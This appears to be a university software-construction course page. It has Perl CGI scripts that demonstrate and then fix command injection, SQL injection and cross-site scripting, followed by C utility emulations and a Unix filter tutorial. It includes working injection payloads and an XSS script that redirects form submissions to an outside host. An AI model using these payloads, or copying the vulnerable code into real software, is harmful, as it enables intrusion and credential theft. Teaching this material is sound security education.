}

sub wrong_password_screen {
    print "Login or password incorrect.\n", p;
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="token" value="$token">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}
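
The token scheme relies on two operations: issuing a token that cannot be guessed, and checking that a presented token was issued recently. The sketch below separates them into two functions. It is an illustration under assumptions, not the script's code: the names `issue_token` and `token_is_valid` are hypothetical, a temporary directory stands in for issued_tokens/, and random bytes from /dev/urandom replace `uuidgen`.

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Temporary directory standing in for issued_tokens/
my $token_dir = tempdir(CLEANUP => 1);

# Create an unguessable token and record it as an empty file.
sub issue_token {
    open my $random, '<', '/dev/urandom' or die "Cannot open /dev/urandom: $!";
    binmode $random;
    my $bytes = '';
    read($random, $bytes, 16) == 16 or die "Short read from /dev/urandom";
    close $random;
    my $token = unpack 'H*', $bytes;    # 16 random bytes as 32 hex digits
    open my $fh, '>', "$token_dir/$token" or die "Cannot record token: $!";
    close $fh;
    return $token;
}

# Accept only well-formed tokens whose file exists and is under a day old.
sub token_is_valid {
    my ($token) = @_;
    return 0 if !defined $token || $token !~ /\A[0-9a-f]{32}\z/;
    my $file = "$token_dir/$token";
    return (-e $file && -M $file < 1) ? 1 : 0;
}

my $token = issue_token();
print "issued token is valid\n"     if token_is_valid($token);
print "guessed token is rejected\n" if !token_is_valid('0' x 32);
```

Checking the token's format before building the file name means a value such as ../passwd is rejected without touching the file system.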


Simulates the security hole present in some Linksys routers

This security hole was exploited to allow the router's operating system to be upgraded by users, by entering a command like this: ;cp${IFS}*/*/nvram${IFS}/tmp/n ;*/n${IFS}set${IFS}boot_wait=on ;*/n${IFS}commit ;*/n${IFS}show>tmp/ping.log

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);



print header, start_html('Simulation of Linksys Ping Test Hole');
warningsToBrowser(1);

$host = param("host");
if (!defined $host) {
	print start_form, 'Enter host to ping: ', textfield('host'), end_form;
} else {
	print "<pre>";
	system "ping -c 1 $host";
	print "</pre>";
}
print end_html;

Simulates the security hole present in some Linksys routers, with the security hole removed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Simulation of Linksys Ping Test Hole');
warningsToBrowser(1);

$host = param("host");
if (!defined $host) {
	print start_form, 'Enter host to ping: ', textfield('host'), end_form;
} else {
	$host = substr $host, 0, 256;          # limit host name to 256 characters
	$host =~ s/[^\w\-\.]//g;               # remove all but permitted characters
	print "<pre>";
	system "ping -c 1 $host";
	print "</pre>";
}
print end_html;

Demonstrates SQL injection

This script expects parameters such as: user=andrewt password=secret

It can be fooled by including SQL code in the password parameter, for example: user=andrewt password=' or '42'='42

These commands generate a suitable sqlite database for the script:

echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db
echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use DBI;

print header, start_html('SQL Injection');
if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be able to authenticate with user <font color=red>andrewt</font>, password <font color=red>secret</font>\n";
    print p,"But try any user with password <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;
$user = param('user');
$password = param('password');
$res = $dbh->selectall_arrayref("SELECT * from passwd where user='$user' and password='$password'");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user='$user' and password='$password'\n",end_html;

The SQL injection script with the security hole fixed

This script expects parameters such as: user=andrewt password=secret

Unlike the previous script, it cannot be fooled by including SQL code in the password parameter, for example: user=andrewt password=' or '42'='42

These commands generate a suitable sqlite database for the script:

echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db
echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);
use DBI;

print header, start_html('SQL Injection - Avoided');
warningsToBrowser(1);

if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be able to authenticate with user <font color=red>andrewt</font>, password <font color=red>secret</font>\n";
    print p,"Adding SQL will not help, e.g. try: <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;

$user = param('user');
$user = substr $user, 0, 64;          # limit user name to 64 characters
$user =~ s/\W+//g;                    # remove all but expected characters
$user = $dbh->quote($user);           # should be unnecessary
$password = param('password');
$password = substr $password, 0, 64;  # limit password to 64 characters
$password = $dbh->quote($password);   # quote SQL special characters

$res = $dbh->selectall_arrayref("SELECT * from passwd where user=$user and password=$password");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user=$user and password=$password\n",end_html;
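
As a rough illustration of what quoting achieves, the sketch below doubles every single quote in a value before wrapping it in quotes, which is the standard SQL way of writing a quote inside a string literal. The helper name sql_quote is hypothetical. In a real script use the database driver's own quoting, as the Perl code above does with $dbh->quote, rather than a hand-rolled version like this one.

```shell
# sql_quote is a hypothetical helper for illustration only:
# double each ' in the value, then wrap the result in single quotes
sql_quote() {
    printf "'%s'\n" "$(printf '%s' "$1" | sed "s/'/''/g")"
}

user=$(sql_quote andrewt)
password=$(sql_quote "' or '42'='42")

# the injected quotes are now part of one long string literal, not SQL syntax
printf "SELECT * from passwd where user=%s and password=%s\n" "$user" "$password"
```

The whole injection attempt ends up inside a single string literal, so it is compared with the stored password like any other wrong guess.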

to exhibit a cross site scripting attack

The code below allows a user to upload a string describing their status. This string is then included in a web page viewed by other users, which is a security hole because it allows a cross-site scripting attack.

A user can upload HTML, which will then be embedded in a web page viewed by other users.

This is a security hole because they can, for example, upload JavaScript which changes the page, such as by redirecting URLs.

For example, they could upload this JavaScript: <script>window.onload = function () {document.getElementsByTagName("form")[0].action = "http://hackers.r.us/hack.cgi";};</script>

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('My Status'), h2('Status Summary');
warningsToBrowser(1);

$data_directory = "./status_data/";
-d $data_directory or mkdir $data_directory or die "Cannot create $data_directory: $!\n";

if (param('new_status')) {
    my $user = param('user');
    
    # sanitize supplied user name
    $user =~ s/\W//g;
    $user = substr($user, 0, 128);
    
    # retrieve correct password from file "status_passwords"
    my $correct_password;
    open P, '<', "status_passwords" or die;
    while (<P>) {
        last if ($correct_password) = /$user:(.*)$/;
    }
    
    # if supplied password is correct update user's status
    
    if (defined $correct_password && $correct_password eq param('password')) {
        open S, '>', "$data_directory/$user" or die;
        print S param('new_status');
        close S;
        print "Status for $user updated\n",p;
    } else {
        print "Error: could not update status for $user\n",p;
    }
}



# display the status of all users
foreach $status_file (glob "$data_directory/*") {
    my ($user) = $status_file =~ /\/([^\/]*)$/;
    open F, '<', $status_file or next;
    my $user_status = join '', <F>;
    print "<li> $user: $user_status\n";
}

# allow users to update their status

print   hr,
        start_form,
        p, 'Username: ', textfield('user'), 
        p, 'Password: ', textfield('password'),
        p, 'New status: ', textfield('new_status'),
        p, submit('Update status'),
        end_form,
        end_html;
exit 0;


to exhibit avoiding a cross site scripting attack

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('My Status'), h2('Status Summary');
warningsToBrowser(1);

$data_directory = "./status_data/";
-d $data_directory or mkdir $data_directory or die "Cannot create $data_directory: $!\n";

if (param('new_status')) {
    my $user = param('user');
    
    # sanitize supplied user name
    $user =~ s/\W//g;
    $user = substr($user, 0, 128);
    
    # retrieve correct password from file "status_passwords"
    my $correct_password;
    open P, '<', "status_passwords" or die;
    while (<P>) {
        last if ($correct_password) = /$user:(.*)$/;
    }
    
    # if supplied password is correct update user's status
    
    if (defined $correct_password && $correct_password eq param('password')) {
        open S, '>', "$data_directory/$user" or die;
        print S param('new_status');
        close S;
        print "Status for $user updated\n",p;
    } else {
        print "Error: could not update status for $user\n",p;
    }
}



# display the status of all users
foreach $status_file (glob "$data_directory/*") {
    my ($user) = $status_file =~ /\/([^\/]*)$/;
    open F, '<', $status_file or next;
    my $user_status = join '', <F>;
    
    # prevent an XSS attack by stopping HTML tags being included
    # this is not sufficient in other contexts
    # https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
    # & must be escaped first, otherwise the & in &lt; and &gt; would be escaped again
    $user_status =~ s/&/&amp;/g;
    $user_status =~ s/</&lt;/g;
    $user_status =~ s/>/&gt;/g;
    print "<li> $user: $user_status\n";
}

# allow users to update their status

print   hr,
        start_form,
        p, 'Username: ', textfield('user'), 
        p, 'Password: ', textfield('password'),
        p, 'New status: ', textfield('new_status'),
        p, submit('Update status'),
        end_form,
        end_html;
exit 0;
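
The escaping step can be tried on its own from the command line. The sketch below applies the same three substitutions with sed; the function name escape_html and the sample input are hypothetical. As the comment in the script notes, this is only enough for text placed between tags, not for other contexts such as attribute values.

```shell
# escape_html is a hypothetical helper for illustration only:
# a filter which makes text safe to place between HTML tags
escape_html() {
    # & must be replaced first, otherwise the & in &lt; and &gt; would be escaped again
    # (in a sed replacement a bare & means "the matched text", so it is written \&)
    sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g'
}

printf '%s\n' '<script>alert("x & y")</script>' | escape_html
```

A browser displays the result as the literal text of the tag instead of running it.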

Week 12  Tutorial: Questions & Sample Answers  Laboratory: Exercises

Friday Oct 20 lecture topics:Exam

Week 13  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions


COMP[29]041 Topic-by-Topic

Intro: lecture slides, lecture notes
External resources: Stack Overflow - Q&A for programmers

Filters: lecture slides, lecture notes, Command Line Examples
External resources: regex101: online regex tester


Simple /bin/cat emulation.

#include <stdio.h>
#include <stdlib.h>

// write bytes of stream to stdout
void process_stream(FILE *in) {
    while (1) {
        int ch = fgetc(in);
        if (ch == EOF)
             break;
        if (fputc(ch, stdout) == EOF) {
            fprintf(stderr, "cat:");
            perror("");
            exit(1);
        }
    }
}

// process files given as arguments
// if no arguments process stdin
int main(int argc, char *argv[]) {
    if (argc == 1)
        process_stream(stdin);
    else
        for (int i = 1; i < argc; i++) {
            FILE *in = fopen(argv[i], "r");
            if (in == NULL) {
                fprintf(stderr, "%s: %s: ", argv[0], argv[i]);
                perror("");
                return 1;
            }
            process_stream(in);
            fclose(in);
        }
    return 0;
}

Simple /usr/bin/wc emulation.

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>

// count lines, words, chars in stream
void process_stream(FILE *in) {
    int n_lines = 0, n_words = 0, n_chars = 0;
    int in_word = 0, c;
    while ((c = fgetc(in)) != EOF) {
        n_chars++;
        if (c == '\n')
            n_lines++;
        if (isspace(c))
            in_word = 0;
        else if (!in_word) {
            in_word = 1;
            n_words++;
        }
    }
    printf("%6d %6d %6d", n_lines, n_words, n_chars);
}

// process files given as arguments
// if no arguments process stdin
int main(int argc, char *argv[]) {
    if (argc == 1) {
        process_stream(stdin);
        printf("\n");   // finish the line of counts when there is no filename to print
    } else
        for (int i = 1; i < argc; i++) {
            FILE *in = fopen(argv[i], "r");
            if (in == NULL) {
                fprintf(stderr, "%s: %s: ", argv[0], argv[i]);
                perror("");
                return 1;
            }
            process_stream(in);
            printf(" %s\n", argv[i]);
            fclose(in);
        }
    return 0;
}
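
One quick way to check an emulation like this is to compare it with the real wc on a small input whose counts are easy to work out by hand. The sketch below runs only the real wc; the function name sample and its text are made up for illustration.

```shell
# sample is a hypothetical helper which prints a tiny known input:
# 2 lines, 3 words, 14 characters (each newline counts as a character)
sample() {
    printf 'one two\nthree\n'
}

sample | wc -l    # count of lines
sample | wc -w    # count of words
sample | wc -c    # count of bytes
```

The amount of padding around the numbers differs between wc implementations, so compare the values rather than the exact spacing.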

Over-simple /usr/bin/grep emulation.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// print lines containing the specified substring
// breaks on long lines, does not implement regexs or other grep features
void process_stream(FILE *stream, char *stream_name, char *substring) {
    char line[65536];
    int line_number = 1;
    while (fgets(line, sizeof line, stream) != NULL) {
        if (strstr(line, substring) != NULL)
            printf("%s:%d:%s", stream_name, line_number, line);
        line_number = line_number + 1;
    }
}

// process files given as arguments
// if no arguments process stdin
int main(int argc, char *argv[]) {
    if (argc == 2)
        process_stream(stdin, "<stdin>", argv[1]);
    else
        for (int i = 2; i < argc; i++) {
            FILE *in = fopen(argv[i], "r");
            if (in == NULL) {
                fprintf(stderr, "%s: %s: ", argv[0], argv[i]);
                perror("");
                return 1;
            }
            process_stream(in, argv[i], argv[1]);
            fclose(in);
        }
    return 0;
}

Over-simple /usr/bin/uniq emulation.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_LINE 65536

// copy stream to stdout except for repeated lines
void process_stream(FILE *stream) {
    char line[MAX_LINE];
    char lastLine[MAX_LINE];
    int line_number = 0;

    // read from the stream passed in, not always from stdin
    while (fgets(line, MAX_LINE, stream) != NULL) {
        if (line_number == 0 || strcmp(line, lastLine) != 0) {
            fputs(line, stdout);
            strncpy(lastLine, line, MAX_LINE);
        }
        line_number++;
    }
}

// process files given as arguments
// if no arguments process stdin
int main(int argc, char *argv[]) {
    if (argc == 1)
        process_stream(stdin);
    else
        for (int i = 1; i < argc; i++) {
            FILE *in = fopen(argv[i], "r");
            if (in == NULL) {
                fprintf(stderr, "%s: %s: ", argv[0], argv[i]);
                perror("");
                return 1;
            }
            process_stream(in);
            fclose(in);
        }
    return 0;
}
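
Like the real uniq, the loop above compares each line only with the line before it, so repeats are removed only when they are adjacent. The sketch below shows the difference that sorting first makes; the function name sample and its input are made up for illustration.

```shell
# sample is a hypothetical helper which prints four lines: b a a b
sample() {
    printf 'b\na\na\nb\n'
}

# adjacent repeats collapse but the second b survives: prints b, a, b
sample | uniq

# sorting first brings equal lines together: prints a, b
sample | sort | uniq
```

This is why uniq is so often seen straight after sort in a pipeline.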
This file contains examples of the use of the most common Unix filter programs (egrep, wc, head, etc.). It also contains solutions to the exercises discussed in lectures.
  1. Consider a file course_codes containing UNSW course codes and names.
    ls -l course_codes
    -rw-r--r-- 1 cs2041 cs2041 603446 Oct 16 22:02 course_codes
    
    wc course_codes
     18181  79223 603446 course_codes
    
    head course_codes
    ACCT1501 Accounting & Financial Mgt 1A
    ACCT1511 Accounting & Financial Mgt 1B
    ACCT2101 Industry Placement 1
    ACCT2507 Intro  to Accounting Research
    ACCT2522 Management Accounting 1
    ACCT2532 Management Accounting (Hons)
    ACCT2542 Corporate Financial Reporting
    ACCT2552 Corporate Financial Rep (Hons)
    ACCT3202 Industry Placement 2
    ACCT3303 Industry Placement 3
    
    It looks like the code is separated from the title by a number of spaces. We can check this via cat -A:
    head -5 course_codes | cat -A
    ACCT1501^IAccounting & Financial Mgt 1A$
    ACCT1511^IAccounting & Financial Mgt 1B$
    ACCT2101^IIndustry Placement 1$
    ACCT2507^IIntro  to Accounting Research$
    ACCT2522^IManagement Accounting 1$
    
    This shows us that our initial guess was wrong, and there's actually a tab character between the course code and title (shown as ^I by cat -A). Also, the location of the end-of-line marker ($) indicates that there are no trailing spaces or tabs.

    If we need to know what COMP courses there are:

    egrep -c COMP course_codes
    191
    
    egrep COMP course_codes
    COMP0011 Fundamentals of Computing
    COMP1000 Web, Spreadsheets & Databases
    COMP1001 Introduction to Computing
    COMP1011 Computing 1A
    COMP1021 Computing 1B
    COMP1081 Harnessing the Power of IT
    COMP1091 Solving Problems with Software
    COMP1400 Programming for Designers
    COMP1711 Higher Computing 1A
    COMP1721 Higher Computing 1B
    COMP1911 Computing 1A
    COMP1917 Computing 1
    COMP1921 Computing 1B
    COMP1927 Computing 2
    COMP2011 Data Organisation
    COMP2021 Digital System Structures
    COMP2041 Software Construction
    COMP2091 Computing 2
    COMP2110 Software System Specification
    COMP2111 System Modelling and Design
    COMP2121 Microprocessors & Interfacing
    COMP2411 Logic and Logic Programming
    COMP2711 Higher Data Organisation
    COMP2811 Computing B
    COMP2911 Eng. Design in Computing
    COMP2920 Professional Issues and Ethics
    COMP3111 Software Engineering
    COMP3120 Introduction to Algorithms
    COMP3121 Algorithms & Programming Tech
    COMP3131 Programming Languages & Compil
    COMP3141 Software Sys Des&Implementat'n
    COMP3151 Foundations of Concurrency
    COMP3152 Comparative Concurrency Semant
    COMP3153 Algorithmic Verification
    COMP3161 Concepts of Programming Lang.
    COMP3171 Object-Oriented Programming
    COMP3211 Computer Architecture
    COMP3221 Microprocessors & Embedded Sys
    COMP3222 Digital Circuits and Systems
    COMP3231 Operating Systems
    COMP3241 Real Time Systems
    COMP3311 Database Systems
    COMP3331 Computer Networks&Applications
    COMP3411 Artificial Intelligence
    COMP3421 Computer Graphics
    COMP3431 Robotic Software Architecture
    COMP3441 Security Engineering
    COMP3511 Human Computer Interaction
    COMP3601 Design Project A
    COMP3710 Software Project Management
    COMP3711 Software Project Management
    COMP3720 Total Quality Management
    COMP3821 Ext Algorithms&Prog Techniques
    COMP3881 Ext Digital Circuits & Systems
    COMP3891 Ext Operating Systems
    COMP3901 Special Project A
    COMP3902 Special Project B
    COMP3931 Ext Computer Networks & App
    COMP4001 Object-Oriented Software Dev
    COMP4002 Logic Synthesis & Verification
    COMP4003 Industrial Software Developmen
    COMP4011 Web Applications Engineering
    COMP4012 Occasional Elec S2 - Comp.Eng.
    COMP4121 Advanced & Parallel Algorithms
    COMP4128 Programming Challenges
    COMP4131 Programming Language Semantics
    COMP4132 Adv. Functional Programming
    COMP4133 Advanced Compiler Construction
    COMP4141 Theory of Computation
    COMP4151 Algorithmic Verification
    COMP4161 Advanced Verification
    COMP4181 Language-based Software Safety
    COMP4211 Adv Architectures & Algorithms
    COMP4314 Next Generation Database Systs
    COMP4317 XML and Databases
    COMP4335 Wireless Mesh&Sensor Networks
    COMP4336 Mobile Data Networking
    COMP4337 Securing Wireless Networks
    COMP4411 Experimental Robotics
    COMP4412 Introduction to Modal Logic
    COMP4415 First-order Logic
    COMP4416 Intelligent Agents
    COMP4418 Knowledge Representation
    COMP4431 Game Design Workshop
    COMP4432 Game Design Studio
    COMP4442 Advanced Computer Security
    COMP4511 User Interface Design & Constr
    COMP4601 Design Project B
    COMP4903 Industrial Training
    COMP4904 Industrial Training 1
    COMP4905 Industrial Training 2
    COMP4906 Industrial Training 3
    COMP4910 Thesis Part A
    COMP4911 Thesis Part B
    COMP4913 Computer Science 4 Honours P/T
    COMP4914 Computer Science 4 Honours F/T
    COMP4920 Management and Ethics
    COMP4930 Thesis Part A
    COMP4931 Thesis Part B
    COMP4941 Thesis Part B
    COMP6714 Info Retrieval and Web Search
    COMP6721 (In-)Formal Methods
    COMP6731 Combinatorial Data Processing
    COMP6733 Internet of Things
    COMP6741 Parameterized & Exact Comp.
    COMP6752 Modelling Concurrent Systems
    COMP6771 Advanced C++ Programming
    COMP9000 Special Program
    COMP9001 E-Commerce Technologies
    COMP9008 Software Engineering
    COMP9009 Adv Topics in Software Eng
    COMP9015 Issues in Computing
    COMP9018 Advanced Graphics
    COMP9020 Foundations of Comp. Science
    COMP9021 Principles of Programming
    COMP9022 Digital Systems Structures
    COMP9024 Data Structures & Algorithms
    COMP9031 Internet Programming
    COMP9032 Microprocessors & Interfacing
    COMP9041 Software Construction
    COMP9081 Harnessing the Power of IT
    COMP9101 Design &Analysis of Algorithms
    COMP9102 Programming Lang & Compilers
    COMP9103 Algorithms & Comp. Complexity
    COMP9104 Quantum ICT
    COMP9116 S'ware Dev: B-Meth & B-Toolkit
    COMP9117 Software Architecture
    COMP9151 Foundations of Concurrency
    COMP9152 Comparative Concurrency Semant
    COMP9153 Algorithmic Verification
    COMP9161 Concepts of Programming Lang.
    COMP9171 Object-Oriented Programming
    COMP9181 Language-based Software Safety
    COMP9201 Operating Systems
    COMP9211 Computer Architecture
    COMP9221 Microprocessors & Embedded Sys
    COMP9222 Digital Circuits and Systems
    COMP9231 Integrated Digital Systems
    COMP9242 Advanced Operating Systems
    COMP9243 Distributed Systems
    COMP9244 Software View of Proc Architec
    COMP9245 Real-Time Systems
    COMP9282 Ext Micros & Interfacing
    COMP9283 Ext Operating Systems
    COMP9311 Database Systems
    COMP9313 Big Data Management
    COMP9314 Next Generation Database Systs
    COMP9315 Database Systems Implementat'n
    COMP9316 eCommerce Implementation
    COMP9317 XML and Databases
    COMP9318 Data Warehousing & Data Mining
    COMP9319 Web Data Compression & Search
    COMP9321 Web Applications Engineering
    COMP9322 Service-Oriented Architectures
    COMP9323 e-Enterprise Project
    COMP9331 Computer Networks&Applications
    COMP9332 Network Routing and Switching
    COMP9333 Advanced Computer Networks
    COMP9334 Systems Capacity Planning
    COMP9335 Wireless Mesh&Sensor Networks
    COMP9336 Mobile Data Networking
    COMP9337 Securing Wireless Networks
    COMP9414 Artificial Intelligence
    COMP9415 Computer Graphics
    COMP9416 Knowledge Based Systems
    COMP9417 Machine Learning & Data Mining
    COMP9418 Advanced Machine Learning
    COMP9431 Robotic Software Architecture
    COMP9441 Security Engineering
    COMP9444 Neural Networks
    COMP9447 Security Engineering Workshop
    COMP9511 Human Computer Interaction
    COMP9514 Advanced Decision Theory
    COMP9515 Pattern Classification
    COMP9517 Computer Vision
    COMP9518 Pattern Recognition
    COMP9519 Multimedia Systems
    COMP9520 Ext Foundations of Computer Sc
    COMP9596 Research Project
    COMP9790 Principles of GNSS Positioning
    COMP9791 Modern Navigation &Positioning
    COMP9801 Ext Design&Analysis of Algo
    COMP9814 Ext Artificial Intelligence
    COMP9833 Ext Computer Networks & Appl
    COMP9844 Ext Neural Networks
    COMP9901 P/T Res. Thesis Comp Sci & Eng
    COMP9902 Res. Thesis Comp Sci & Eng F/T
    COMP9910 Mgt&Com Skills-CompSci&Eng Res
    COMP9912 Project (24 UOC)
    COMP9930 Readings in Comp Sci and Eng
    COMP9945 Research Project
    
    Either of the two commands below tells us which courses have "comp" in their name or code (in upper or lower case).
    tr A-Z a-z <course_codes | egrep comp
    aciv2518 eng computational methods 1
    acsc1600 computer science 1
    acsc1800 computer science 1e
    acsc2015 interactive computer graphics
    acsc2020 computer science core b2
    acsc2021 computer systems architectrue 2
    acsc2107 computer languages b
    acsc2601 computer science 2a
    acsc2602 computer science 2b
    acsc2802 computer science 2ee
    acsc3003 computer project
    acsc3029 computing project 3
    acsc3030 cryptography & computer securi
    acsc3601 computer science 3a
    acsc3603 computer science 3c
    acsc4191 computer science 4 (hons) f/t
    acsc7304 computer graphics
    acsc7306 computer speech processing
    acsc7336 computer security
    acsc8248 computer graphics (12 cpt)
    acsc9000 computer science research f/t
    acsc9001 computer science research p/t
    aele2007 computer design
    aele2508 microcomputer interfacing
    aele3031 microcomputer interfacing
    aele4511 computer control theory
    amat3107 complex variables
    amat3401 complex analysis 3e
    amat3503 complex variables e
    amec3512 pumps, turbines & compressors
    ance8001 computational mathematics
    ance8002 supercomputing techniques
    ance9105 comp techniques fluid dynamics
    aphy3028 computational physics
    arch1391 digital computation studio
    arch5202 computer applications 2
    arch5203 computer applications 3
    arch5205 theory of architectural computin
    arch5220 computer graphics programming 1
    arch5221 computer graphics programming 2
    arch5223 computer applications 2
    arch5940 theory of architectural computin
    arch5942 arctitectural computing seminar
    arch5943 theory of architectural computin
    arch6201 architectural computing 1
    arch6205 architectural computing 2
    arch6214 architectural computing 2
    arch7204 design computing theory
    arch7205 computer graphics programming
    arts2301 computers, brains & minds
    atax0002 computer information systems
    atax0053 acct for complex struct & inst
    atax0324 gst: complex issues & planning
    atax0341 comparative tax systems
    atax0424 gst: complex issues & planning
    atax0441 comparative tax systems
    atax0524 gst: complex issues & planning
    atax0641 comparative tax systems
    aust2003 aborig. studies: a global compar
    aven1500 computing for aviation
    beil0003 be annual design competition
    beil0004 design competitions and bids
    benv1141 computers and information tech
    benv1242 computer-aided design
    benv2405 computer graphics programming
    binf3020 computational bioinformatics
    binf9020 computational bioinformatics
    biom5912 comp thesis b&c
    biom5920 thesis part a (comp)
    biom5921 thesis part b (comp)
    biom9332 biocompatibility
    biom9501 computing for biomedical eng
    biom9601 biomed applic.of microcomp 1
    biom9602 biomed applic.of microcomp 2
    bios3021 comparative animal physiology
    bldg2281 introduction to computing
    bldg3282 computer apps in building
    bldg3482 computer aplications in constr
    ceic5310 computing studies in the process
    ceic8310 computing studies proc ind
    ceic8335 adv computer methods
    chem3031 inorg chem:trans metals & comp
    chem3640 computers in chemistry
    civl1015 computing
    civl1106 computing & graphics
    civl3015 engineering computations
    civl3106 engineering computations
    cmed9517 adv biostatistic & stat comp
    code1110 computational design theory 1
    code1210 computational design theory 2
    code2110 computational design theory 3
    code2120 computational sustainability
    code2121 advanced computational design
    cofa2682 multi-media computing unit 3
    cofa3681 multi-media computing elective 1
    cofa5116 design & computers
    cofa5130 typography & composition
    cofa5216 design & computers 1
    cofa5240 design & computers 2 cad
    cofa5241 design & computers 2 graphics
    cofa5338 design & computers 3 - cad
    cofa5339 design & computers 3 - graphic
    cofa8670 intro to multi-media computing
    comd2040 of tigers & pussycats: a compa
    comp0011 fundamentals of computing
    comp1000 web, spreadsheets & databases
    comp1001 introduction to computing
    comp1011 computing 1a
    comp1021 computing 1b
    comp1081 harnessing the power of it
    comp1091 solving problems with software
    comp1400 programming for designers
    comp1711 higher computing 1a
    comp1721 higher computing 1b
    comp1911 computing 1a
    comp1917 computing 1
    comp1921 computing 1b
    comp1927 computing 2
    comp2011 data organisation
    comp2021 digital system structures
    comp2041 software construction
    comp2091 computing 2
    comp2110 software system specification
    comp2111 system modelling and design
    comp2121 microprocessors & interfacing
    comp2411 logic and logic programming
    comp2711 higher data organisation
    comp2811 computing b
    comp2911 eng. design in computing
    comp2920 professional issues and ethics
    comp3111 software engineering
    comp3120 introduction to algorithms
    comp3121 algorithms & programming tech
    comp3131 programming languages & compil
    comp3141 software sys des&implementat'n
    comp3151 foundations of concurrency
    comp3152 comparative concurrency semant
    comp3153 algorithmic verification
    comp3161 concepts of programming lang.
    comp3171 object-oriented programming
    comp3211 computer architecture
    comp3221 microprocessors & embedded sys
    comp3222 digital circuits and systems
    comp3231 operating systems
    comp3241 real time systems
    comp3311 database systems
    comp3331 computer networks&applications
    comp3411 artificial intelligence
    comp3421 computer graphics
    comp3431 robotic software architecture
    comp3441 security engineering
    comp3511 human computer interaction
    comp3601 design project a
    comp3710 software project management
    comp3711 software project management
    comp3720 total quality management
    comp3821 ext algorithms&prog techniques
    comp3881 ext digital circuits & systems
    comp3891 ext operating systems
    comp3901 special project a
    comp3902 special project b
    comp3931 ext computer networks & app
    comp4001 object-oriented software dev
    comp4002 logic synthesis & verification
    comp4003 industrial software developmen
    comp4011 web applications engineering
    comp4012 occasional elec s2 - comp.eng.
    comp4121 advanced & parallel algorithms
    comp4128 programming challenges
    comp4131 programming language semantics
    comp4132 adv. functional programming
    comp4133 advanced compiler construction
    comp4141 theory of computation
    comp4151 algorithmic verification
    comp4161 advanced verification
    comp4181 language-based software safety
    comp4211 adv architectures & algorithms
    comp4314 next generation database systs
    comp4317 xml and databases
    comp4335 wireless mesh&sensor networks
    comp4336 mobile data networking
    comp4337 securing wireless networks
    comp4411 experimental robotics
    comp4412 introduction to modal logic
    comp4415 first-order logic
    comp4416 intelligent agents
    comp4418 knowledge representation
    comp4431 game design workshop
    comp4432 game design studio
    comp4442 advanced computer security
    comp4511 user interface design & constr
    comp4601 design project b
    comp4903 industrial training
    comp4904 industrial training 1
    comp4905 industrial training 2
    comp4906 industrial training 3
    comp4910 thesis part a
    comp4911 thesis part b
    comp4913 computer science 4 honours p/t
    comp4914 computer science 4 honours f/t
    comp4920 management and ethics
    comp4930 thesis part a
    comp4931 thesis part b
    comp4941 thesis part b
    comp6714 info retrieval and web search
    comp6721 (in-)formal methods
    comp6731 combinatorial data processing
    comp6733 internet of things
    comp6741 parameterized & exact comp.
    comp6752 modelling concurrent systems
    comp6771 advanced c++ programming
    comp9000 special program
    comp9001 e-commerce technologies
    comp9008 software engineering
    comp9009 adv topics in software eng
    comp9015 issues in computing
    comp9018 advanced graphics
    comp9020 foundations of comp. science
    comp9021 principles of programming
    comp9022 digital systems structures
    comp9024 data structures & algorithms
    comp9031 internet programming
    comp9032 microprocessors & interfacing
    comp9041 software construction
    comp9081 harnessing the power of it
    comp9101 design &analysis of algorithms
    comp9102 programming lang & compilers
    comp9103 algorithms & comp. complexity
    comp9104 quantum ict
    comp9116 s'ware dev: b-meth & b-toolkit
    comp9117 software architecture
    comp9151 foundations of concurrency
    comp9152 comparative concurrency semant
    comp9153 algorithmic verification
    comp9161 concepts of programming lang.
    comp9171 object-oriented programming
    comp9181 language-based software safety
    comp9201 operating systems
    comp9211 computer architecture
    comp9221 microprocessors & embedded sys
    comp9222 digital circuits and systems
    comp9231 integrated digital systems
    comp9242 advanced operating systems
    comp9243 distributed systems
    comp9244 software view of proc architec
    comp9245 real-time systems
    comp9282 ext micros & interfacing
    comp9283 ext operating systems
    comp9311 database systems
    comp9313 big data management
    comp9314 next generation database systs
    comp9315 database systems implementat'n
    comp9316 ecommerce implementation
    comp9317 xml and databases
    comp9318 data warehousing & data mining
    comp9319 web data compression & search
